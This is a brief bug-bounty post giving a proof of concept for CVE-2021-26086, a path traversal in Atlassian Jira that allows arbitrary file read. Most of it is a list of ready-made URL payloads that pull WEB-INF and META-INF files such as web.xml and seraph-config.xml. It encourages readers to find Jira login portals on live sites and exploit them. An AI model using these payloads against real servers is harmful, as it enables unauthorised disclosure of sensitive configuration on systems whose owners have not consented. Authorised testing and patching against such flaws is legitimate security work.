JIRA Path Traversal POC || CVE-2021-26086 || P3 || Information Disclosure || 2021|| Live site||
Title: Path traversal Leads to Arbitrary-File-Read Sensitive with information disclosure (Jira)
CVE-2021-26086
Severity: Medium
Still, this is vulnerable any many VPD programs...so check for their Jira login portals and U can exploit it!
Payloads:
/s/123cfx/_/;/WEB-INF/web.xml
/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/cfx//;/WEB-INF/decorators.xml
/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
/s/cfx//;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s/cfx//;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
Reference: https://packetstormsecurity.com/files...
#bugbounty #POC
